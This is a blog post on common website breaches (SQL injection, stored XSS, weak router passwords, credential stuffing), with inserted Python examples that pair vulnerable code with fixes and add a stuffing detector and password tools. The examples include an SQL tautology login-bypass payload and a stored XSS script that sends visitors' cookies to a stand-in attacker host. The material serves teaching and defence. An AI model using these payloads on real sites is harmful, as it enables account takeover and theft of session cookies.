There has been a considerable amount of “hacking” going on lately: sites going down, content being stolen, DDoS being leveraged.
So while there are various methods of “hacking” a site, I think there is one thing that ties all of this insanity together.
Sure, you can DDoS a site right out of existence – but that’s not really hacking. If you think that hacking a site is the same thing as flooding it with bad traffic until the server or pipe chokes… you clearly don’t understand the way that hacking or attack/defense actually works.
Layer 7 Breach
One of the more popular ways of hacking a site is by finding a flaw in the web application itself, such as Cross-Site Scripting (XSS) or SQL Injection… flaws that a great many sites contain if you look hard enough.
These attacks involve either extracting data from the site’s database(s) or injecting content into the site. If you’re extracting data, you want things like email addresses, passwords (or their hashes), personal details, credit cards or anything else of financial value to criminals; SQL Injection is the classic route, because attacker-controlled input ends up changing the query the site runs.
If you’re injecting data, you’re typically putting something onto the site, such as a script (a stored XSS payload) that changes what the site serves to its visitors… the most common goal is to use that to deliver a Trojan that attacks and compromises the client.
In either case the object is to be stealthy and make as little noise as possible until you’ve gotten what you needed and are long, long gone.
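The extraction and injection cases above, as an added example that is not code from the original post: a tiny sqlite-backed login and comment feature written the way a vulnerable site writes it, next to the fixed version. The table layout, the users, the comment payload and the helper names (`login_vulnerable`, `login_fixed`, `render_comments_*`) are all constructed for this demo; real sites should of course store password hashes, not the plaintext shown here, which only makes the “steal passwords” case easier to see.

```python
"""Added example (not from the original post): SQL injection (extraction) and
stored XSS (injection) in a toy site, each beside its fix. All data is
constructed for the demo; the login table stores plaintext only to keep the
extraction visible (a real site stores hashes)."""
import html
import sqlite3


def make_db():
    # Constructed sample data: an in-memory site database with two users.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT, email TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "alice@example.com"),
         ("bob", "hunter2", "bob@example.com")],
    )
    con.execute("CREATE TABLE comments (body TEXT)")
    return con


# --- Extraction: SQL injection -------------------------------------------

def login_vulnerable(con, username, password):
    """Builds the query by string concatenation, so the attacker writes SQL."""
    sql = ("SELECT username, email FROM users WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    return con.execute(sql).fetchall()


def login_fixed(con, username, password):
    """Parameterised query: values travel separately from the SQL text, so a
    quote in the input can never change the statement's structure."""
    sql = "SELECT username, email FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchall()


# --- Injection: stored cross-site scripting --------------------------------

def post_comment(con, body):
    """Stores a visitor comment (the parameterised insert is already safe)."""
    con.execute("INSERT INTO comments VALUES (?)", (body,))


def render_comments_vulnerable(con):
    """Interpolates stored text straight into HTML, so a stored <script>
    runs in every later visitor's browser: the 'deliver a Trojan' case."""
    rows = con.execute("SELECT body FROM comments").fetchall()
    return "".join("<p>%s</p>" % body for (body,) in rows)


def render_comments_fixed(con):
    """Escapes on output, so the browser shows the payload as plain text."""
    rows = con.execute("SELECT body FROM comments").fetchall()
    return "".join("<p>%s</p>" % html.escape(body) for (body,) in rows)


if __name__ == "__main__":
    con = make_db()
    # Classic tautology: the rest of the WHERE clause is commented out by "--".
    payload = "' OR '1'='1' -- "
    print(login_vulnerable(con, payload, "anything"))  # dumps every user
    print(login_fixed(con, payload, "anything"))       # []
    post_comment(con, "<script>document.location="
                      "'http://evil.example/?c='+document.cookie</script>")
    print(render_comments_vulnerable(con))  # script tag intact
    print(render_comments_fixed(con))       # &lt;script&gt;...
```

The two fixes are the same idea applied at two boundaries: keep data and code separate when talking to the database (bind parameters) and when talking to the browser (escape on output).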
Breaches at the network layer are becoming less and less common but still happen. A router with a wide open enable password (blank, default or trivially guessed) lets someone jump on, monitor traffic, mirror some of it to a port they control, and who knows what else… you’ve been compromised.
With the myriad of network devices today, from load balancers to firewalls to switches and routers, hardware or software-based, it’s not uncommon to find at least one device with open, or at least easily breakable, access.
Servers aren’t getting broken into directly as much either. The legacy method was to find a buffer overflow in the web server, fire the exploit and hope the machine (a) doesn’t crash and (b) has exactly the right memory addresses, processor architecture and so on for the exploit to work. Too hard, too much work, too easy to detect.
Why go through all that trouble, devising attacks, crafting packets and attempting exploits, when you can simply download a database of 1.3 million username/password pairs from the latest compromise (Gawker Media) via BitTorrent… and then try all those pairs against thousands of sites world-wide? (This is what’s now called credential stuffing.)
I’m 100% serious here… password re-use is rampant, and people often use the same username/password pair for their banking/credit card sites, throw-away promotional sites they’ll never come back to, and things like Facebook: all the same username and password.
So is this really hacking? Nope, it’s 100x simpler, less messy, and a lot more rewarding… and sadly it’s happening right now.
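What the replay of a leaked list looks like from the defender’s side, as an added example that is not part of the original post: a detector run over constructed login-log lines. The log format (`<ip> <user> OK|FAIL`), the addresses and the thresholds are assumptions made for the demo; a real deployment would read its own auth log and tune the thresholds to its traffic.

```python
"""Added example (not from the original post): spotting a credential-stuffing
run in login logs. The log format, IPs and users below are constructed."""
import re
from collections import defaultdict

# Constructed sample lines from a hypothetical login endpoint: "<ip> <user> <result>".
# 203.0.113.7 walks a leaked list across many accounts; 198.51.100.4 is one
# user mistyping their own password; 192.0.2.9 is a normal login.
SAMPLE_LOG = """\
203.0.113.7 alice FAIL
203.0.113.7 bob FAIL
203.0.113.7 carol FAIL
203.0.113.7 dave OK
203.0.113.7 erin FAIL
203.0.113.7 frank FAIL
198.51.100.4 alice FAIL
198.51.100.4 alice FAIL
198.51.100.4 alice OK
192.0.2.9 grace OK
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (OK|FAIL)$")


def parse(log_text):
    """Yield (ip, user, ok) tuples; lines that don't match the format are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3) == "OK"


def find_stuffing(log_text, min_users=5, max_success_rate=0.3):
    """Flag source IPs that try many distinct usernames with a low success rate.

    A leaked list replayed against a site produces exactly that shape: one
    source, many different accounts, mostly failures. A legitimate user who
    fumbles their own password hits one account only, so is not flagged.
    For each flagged source, report the accounts where the reused password
    worked; those are the users who must be forced to reset."""
    per_ip = defaultdict(lambda: {"users": set(), "attempts": 0, "hits": set()})
    for ip, user, ok in parse(log_text):
        rec = per_ip[ip]
        rec["users"].add(user)
        rec["attempts"] += 1
        if ok:
            rec["hits"].add(user)

    flagged = {}
    for ip, rec in per_ip.items():
        rate = len(rec["hits"]) / rec["attempts"]
        if len(rec["users"]) >= min_users and rate <= max_success_rate:
            flagged[ip] = {
                "distinct_users": len(rec["users"]),
                "attempts": rec["attempts"],
                "success_rate": round(rate, 2),
                "hit_accounts": sorted(rec["hits"]),
            }
    return flagged


if __name__ == "__main__":
    for ip, info in find_stuffing(SAMPLE_LOG).items():
        print(ip, info)
```

The distinct-username count is what separates stuffing from ordinary brute force against one account; the success rate separates it from a busy NAT gateway fronting many real users, who mostly log in fine.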
Sadly, today it’s still down to passwords on websites. Get a password manager that synchronizes between your phone and your computer, or one that lives on your mobile device by itself.
Get something that’s encrypted reasonably well, can generate a different random password for every site on the fly, and stores them in a way that lets you retrieve them when you need them in a hurry.
Otherwise, when the next site gets compromised and its username/password combinations are all over BitTorrent… you will be left wondering: just how many sites did I re-use that username/password combination on?
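The two jobs a password manager does for you here, generating a unique random password per site and answering the closing question of how many sites share one, as an added example that is not part of the original post. The vault layout (site mapped to a username/password pair) and its contents are constructed for the demo; a real manager keeps this encrypted at rest.

```python
"""Added example (not from the original post): generating per-site random
passwords and auditing a vault for reuse. The vault is constructed sample data."""
import math
import secrets
import string
from collections import defaultdict

ALPHABET = string.ascii_letters + string.digits + string.punctuation  # 94 chars


def generate_password(length=20, alphabet=ALPHABET):
    """Draw every character from the OS CSPRNG via `secrets` (never `random`)."""
    return "".join(secrets.choice(alphabet) for _ in range(length))


def entropy_bits(length, alphabet=ALPHABET):
    """Entropy of a uniformly random string: length * log2(|alphabet|)."""
    return length * math.log2(len(alphabet))


def reuse_report(vault):
    """Group vault entries by password. Any group with more than one site is
    the blast radius of a single leak: one dumped site unlocks all of them."""
    by_password = defaultdict(list)
    for site, (username, password) in vault.items():
        by_password[password].append(site)
    return {pw: sorted(sites) for pw, sites in by_password.items() if len(sites) > 1}


# Constructed example vault: site -> (username, password).
SAMPLE_VAULT = {
    "bank.example": ("jane", "Summer2010!"),
    "facebook.example": ("jane", "Summer2010!"),
    "promo-signup.example": ("jane", "Summer2010!"),
    "leaked-site.example": ("jane", "Summer2010!"),   # the one whose dump hits BitTorrent
    "mail.example": ("jane", "xQ7#pL9@mK2$vB5&nR8!"),  # unique, so a leak stops here
}


if __name__ == "__main__":
    print("new 20-char password:", generate_password(), "(%.0f bits)" % entropy_bits(20))
    for pw, sites in reuse_report(SAMPLE_VAULT).items():
        print("reused on %d sites: %s" % (len(sites), ", ".join(sites)))
```

Twenty characters from a 94-symbol alphabet is about 131 bits, far beyond anything a leaked-list replay or offline cracking run will recover; the point of the audit is that a strong password shared across four sites is still only as safe as the weakest of the four.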